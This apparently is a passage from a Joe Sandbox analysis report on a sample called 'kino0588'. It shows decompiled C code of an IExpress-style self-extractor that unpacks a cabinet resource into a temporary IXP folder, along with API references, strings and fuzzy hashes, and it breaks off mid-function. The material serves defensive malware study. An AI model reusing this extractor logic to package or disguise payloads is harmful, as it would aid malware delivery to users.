				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xb89140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xb88584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xb88584, 0x841), 5); // executed
				}
				_t10 = E00B84EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00B84CA0, E00B84CC0, E00B84980, E00B84A50, E00B84AD0, E00B84B60, E00B84BC0, 1, 0xb89148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xb89148; // 0x0
						_t24 =  *0xb88584; // 0x0
						E00B844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xb81140, 0, E00B84CD0, 0, 0xb89140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xb88584; // 0x0
					E00B844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xb89140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xb89140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xb891d8; // 0x0
						if(_t47 == 0) {
							E00B844B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xb88a38 & 0x00000001) == 0 && ( *0xb89a34 & 0x00000001) == 0) {
						SendMessageA( *0xb88584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00b84fe0
0x00b84fe6
0x00b84ff9
0x00b8500d
0x00b85013
0x00b8501a
0x00b85163
0x00b85163
0x00b85020
0x00b85027
0x00b85037
0x00b85051
0x00b85051
0x00b85057
0x00b8505e
0x00b850a7
0x00b850ad
0x00b850b4
0x00b850e8
0x00b850e8
0x00b850ee
0x00b850ff
0x00b85104
0x00b85106
0x00000000
0x00b85106
0x00b850cd
0x00b850d3
0x00b850da
0x00000000
0x00000000
0x00b850dd
0x00b850e6
0x00000000
0x00000000
0x00000000
0x00b85060
0x00b85060
0x00b85070
0x00b85075
0x00b85107
0x00b85107
0x00b8510e
0x00b85111
0x00b85117
0x00b85117
0x00b8511f
0x00b85121
0x00b85127
0x00b85135
0x00b85135
0x00b85127
0x00b85141
0x00b85159
0x00b85159
0x00000000
0x00b8515f

APIs

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00B84FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00B85006
LockResource.KERNEL32(00000000), ref: 00B8500D
GetDlgItem.USER32(00000000,00000842), ref: 00B85030
ShowWindow.USER32(00000000), ref: 00B85037
GetDlgItem.USER32(00000841,00000005), ref: 00B8504A
ShowWindow.USER32(00000000), ref: 00B85051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00B85111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00B85159

Strings

CABINET, xrefs: 00B84FE6, 00B84FF7
*MEMCAB, xrefs: 00B850C7

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: e72c5f4f67130fc4a861959bf43c97d68c90135cf3b5c0dd95694df1d587c344
Instruction ID: ce743c590fd2e23c7b0466a83856183e410eb9fd81e561ec959a4649b2f85a27
Opcode Fuzzy Hash: e72c5f4f67130fc4a861959bf43c97d68c90135cf3b5c0dd95694df1d587c344
Instruction Fuzzy Hash: 473161B16806027BE7207B65AD8EF6736DDE744B55F080095F902B72B1DFB98C40C761

Uniqueness

Uniqueness Score: -1.00%

Function 00B853A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00B853A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xb88004; // 0xfbc33aab
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00B8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00B81680(_t32, 0x104, _t20);
					E00B8658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00B86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xb88a20 = 1;
				goto L5;
			}

0x00b853ac
0x00b853b3
0x00b853b9
0x00b853bb
0x00b853bd
0x00b853bf
0x00b853d1
0x00b853d6
0x00b853e0
0x00b853e2
0x00b853f5
0x00b853fb
0x00b85402
0x00b8540b
0x00000000
0x00000000
0x00b85413
0x00000000
0x00000000
0x00b85415
0x00b85416
0x00b85427
0x00b8542a
0x00b8542b
0x00b85434
0x00b85434
0x00b8543a
0x00b8544c
0x00b8544c
0x00b85452
0x00b8545a
0x00000000
0x00000000
0x00b8545e
0x00b8545f
0x00000000

APIs

Part of subcall function 00B8171E: _vsnprintf.MSVCRT ref: 00B81750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B853FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85452

Strings

IXP, xrefs: 00B85419
IXP%03d.TMP, xrefs: 00B853C0
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B853B7, 00B853E1, 00B8541E

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-390439592
Opcode ID: 639715962b09932cf54a22846d3e7dd3c7261830e0963c77f6567406c38e1288
Instruction ID: f380153d66435c08f4dc77d83719f9f3ca2862f7fcaf13fd8cbe57cfcf597bbe
Opcode Fuzzy Hash: 639715962b09932cf54a22846d3e7dd3c7261830e0963c77f6567406c38e1288
Instruction Fuzzy Hash: 7B11C17170160467E320BB269C49FEF77ADEBC6711F0005AAF646D32B0DE748982C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B85467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00B85467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xb88004; // 0xfbc33aab
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xb891e4;
					_t42 = 0x104;
					E00B81680(0xb891e4, 0x104);
					L14:
					_t13 = E00B858C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xb89124 = 0;
							_t14 = 1;
							L24:
							return E00B86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00B8597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xb88a20; // 0x0
						if(_t61 != 0) {
							 *0xb88a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xb89124 = E00B86285();
						goto L22;
					}
					 *0xb88a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00B853A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xb891e4;
				E00B81781(0xb891e4, 0x104, __ecx,  &_v268);
				if(( *0xb89a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00B8658A(_t48, 0x104, 0xb81140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00B8658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00b85472
0x00b85479
0x00b85481
0x00b85484
0x00b8551c
0x00b85521
0x00b85528
0x00b8552d
0x00b8552f
0x00b85539
0x00b8554d
0x00b8554d
0x00b85552
0x00b85585
0x00b85585
0x00b8558b
0x00b8558d
0x00b8559d
0x00b8559d
0x00b85557
0x00b8555e
0x00000000
0x00000000
0x00b85560
0x00b85566
0x00b85569
0x00b8556f
0x00b8556f
0x00b85581
0x00b85581
0x00000000
0x00b85581
0x00b85545
0x00b8557c
0x00000000
0x00b8557c
0x00b85547
0x00000000
0x00b85547
0x00b8548a
0x00b85490
0x00b85497
0x00000000
0x00000000
0x00b8549d
0x00b854ab
0x00b854b4
0x00b854c0
0x00b8550c
0x00b85511
0x00b85515
0x00000000
0x00b85515
0x00b854c9
0x00b854d6
0x00b854d8
0x00b854fe
0x00b85503
0x00b85507
0x00000000
0x00b85507
0x00b854da
0x00b854dd
0x00b854f7
0x00000000
0x00b854f7
0x00b854df
0x00b854e2
0x00b854f0
0x00000000
0x00b854f0
0x00b854e7
0x00000000
0x00000000
0x00b854e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B854C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8556F

Part of subcall function 00B853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B853FB
Part of subcall function 00B853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85402
Part of subcall function 00B853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8541F
Part of subcall function 00B853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B8542B
Part of subcall function 00B853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00B85434

Strings

alpha, xrefs: 00B854F0
ppc, xrefs: 00B854E9
mips, xrefs: 00B854F7
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B8547D, 00B85481, 00B854AB, 00B8551C, 00B8553C, 00B85568
i386, xrefs: 00B854FE

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-994843058
Opcode ID: b16ce54162e2faa2c963b9a1ec9945c380d2414b92d78fe369829b5def149fc2
Instruction ID: d2993efd451f040e539b554e7ff861f95e1f5038fce47d2fea063682ac758d9a
Opcode Fuzzy Hash: b16ce54162e2faa2c963b9a1ec9945c380d2414b92d78fe369829b5def149fc2
Instruction Fuzzy Hash: 9331A471B01A056BCB34BF299C856FF77DEEBA1740B1801EAA402976B4DF708E42C795

Uniqueness

Uniqueness Score: -1.00%

Function 00B8256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00B8256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00B824E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00b82572
0x00b82573
0x00b82575
0x00b82578
0x00b8257d
0x00b82627
0x00b82583
0x00b82586
0x00b82589
0x00b825eb
0x00b82607
0x00000000
0x00b82609
0x00b8261a
0x00000000
0x00b8261a
0x00000000
0x00b8258b
0x00b8258b
0x00b8259e
0x00b825b2
0x00b825ba
0x00b825cb
0x00b825d1
0x00b825d6
0x00b825da
0x00b825dd
0x00b825dd
0x00b825e3
0x00b825e3
0x00b825e3
0x00b8258b
0x00b82589
0x00b8262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00B84096,00B84096,?,00B81ED3,00000001,00000000,?,?,00B84137,?), ref: 00B825B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00B84096,?,00B81ED3,00000001,00000000,?,?,00B84137,?,00B84096), ref: 00B825CB
RegCloseKey.KERNELBASE(?,?,00B81ED3,00000001,00000000,?,?,00B84137,?,00B84096), ref: 00B825DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00B84096,00B84096,?,00B81ED3,00000001,00000000,?,?,00B84137,?), ref: 00B825FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00B84096,00000000,00000000,00000000,00000000,?,00B81ED3,00000001,00000000), ref: 00B8261A

Strings

PendingFileRenameOperations, xrefs: 00B825C3
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00B825F5
System\CurrentControlSet\Control\Session Manager, xrefs: 00B825A8

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 170603bc5ce3ef56284e59576d887d097dcb484d5be9d2c9a08905438c4f66a4
Instruction ID: e179a593b89ee56b92f338103d01430c1d2eddc70a86aed792a07154e3c2290f
Opcode Fuzzy Hash: 170603bc5ce3ef56284e59576d887d097dcb484d5be9d2c9a08905438c4f66a4
Instruction Fuzzy Hash: D4114235942229FBAB20AB919C19DFB7FFCEF157A1F504096B908A2031DA305E44E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B86A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00B87155();
				_push(0x58);
				_push(0xb872b8);
				E00B87208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xb888b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xb888b0; // 0x2
						if(__eflags != 0) {
							 *0xb881e4 = _t58;
							goto L13;
						} else {
							 *0xb888b0 = _t58;
							_t37 = E00B86C3F(0xb810b8, 0xb810c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00B86FF4();
						L13:
						_t68 =  *0xb888b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xb810b4);
							_push(0xb810ac);
							L00B87202();
							 *0xb888b0 = 2;
						}
						if(_t53 == 0) {
							 *0xb888ac = 0;
						}
						_t71 =  *0xb888b4;
						if( *0xb888b4 != 0 && E00B87060(_t71, 0xb888b4) != 0) {
							_t60 =  *0xb888b4; // 0x0
							 *0xb8a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76235b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00B82BFB(0xb80000, 0, _t59); // executed
							 *0xb881e0 = _t30;
							__eflags =  *0xb881f8;
							if( *0xb881f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xb881e4;
							if( *0xb881e4 == 0) {
								__imp___cexit();
								_t30 =  *0xb881e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00B8724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00b86a60
0x00b86a6a
0x00b86a6c
0x00b86a71
0x00b86a78
0x00b86a7f
0x00b86a85
0x00b86a8e
0x00b86a91
0x00b86a93
0x00b86a9c
0x00b86aa2
0x00000000
0x00000000
0x00b86aa6
0x00b86ab4
0x00000000
0x00b86aa8
0x00b86aaa
0x00b86aab
0x00b86aab
0x00b86abf
0x00b86abf
0x00b86ac5
0x00b86ad1
0x00b86ad7
0x00b86b05
0x00000000
0x00b86ad9
0x00b86ad9
0x00b86ae9
0x00b86af0
0x00b86af2
0x00000000
0x00b86af4
0x00b86af4
0x00b86afb
0x00b86afb
0x00b86af2
0x00b86ac7
0x00b86ac7
0x00b86ac9
0x00b86b0b
0x00b86b0b
0x00b86b11
0x00b86b13
0x00b86b18
0x00b86b1d
0x00b86b24
0x00b86b24
0x00b86b30
0x00b86b39
0x00b86b39
0x00b86b3b
0x00b86b42
0x00b86b57
0x00b86b5f
0x00b86b65
0x00b86b65
0x00b86b67
0x00b86b6c
0x00b86b6e
0x00b86b71
0x00b86b74
0x00b86b74
0x00b86b79
0x00000000
0x00000000
0x00b86b7d
0x00b86b81
0x00000000
0x00000000
0x00b86b83
0x00b86b8c
0x00b86b8d
0x00b86b90
0x00b86b90
0x00b86b83
0x00b86b81
0x00b86b94
0x00b86b98
0x00b86ba2
0x00b86b9a
0x00b86b9a
0x00b86b9a
0x00b86ba3
0x00b86bab
0x00b86bb0
0x00b86bb5
0x00b86bbc
0x00b86bbf
0x00000000
0x00b86bbf
0x00b86c1e
0x00b86c25
0x00b86c27
0x00b86c2d
0x00b86c2d
0x00b86c32
0x00000000
0x00b86bc5
0x00b86bc5
0x00b86bc8
0x00b86bcc
0x00b86bce
0x00b86bce
0x00b86bd1
0x00b86bd3
0x00b86bd3
0x00b86bd6
0x00b86bda
0x00b86be1
0x00b86be3
0x00b86be5
0x00b86be5
0x00b86be6
0x00b86be6
0x00b86be9
0x00b86bea
0x00b86bea
0x00b86b74
0x00b86c39
0x00b86c3e
0x00b86c3e
0x00b86abe
0x00b86abe
0x00000000

APIs

Part of subcall function 00B87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B87182
Part of subcall function 00B87155: GetCurrentProcessId.KERNEL32 ref: 00B87191
Part of subcall function 00B87155: GetCurrentThreadId.KERNEL32 ref: 00B8719A
Part of subcall function 00B87155: GetTickCount.KERNEL32 ref: 00B871A3
Part of subcall function 00B87155: QueryPerformanceCounter.KERNEL32(?), ref: 00B871B8

GetStartupInfoW.KERNEL32(?,00B872B8,00000058), ref: 00B86A7F
Sleep.KERNEL32(000003E8), ref: 00B86AB4
_amsg_exit.MSVCRT ref: 00B86AC9
_initterm.MSVCRT ref: 00B86B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00B86B49
exit.KERNELBASE ref: 00B86BBF
_ismbblead.MSVCRT ref: 00B86BDA

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: f8e3bad4d61fcbd69f89b85c603d6793afad85243ace45be81f44fd4f208e1a9
Instruction ID: 5b8ecbc2953e1414e774c44389fea127dd9eed7faf4d9b9a373775da78b69147
Opcode Fuzzy Hash: f8e3bad4d61fcbd69f89b85c603d6793afad85243ace45be81f44fd4f208e1a9
Instruction Fuzzy Hash: F241E231948325CFEB21BF68DC4A76A77E4EB48724F6441AAE841E72B0CF748C41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B858C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00B858C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
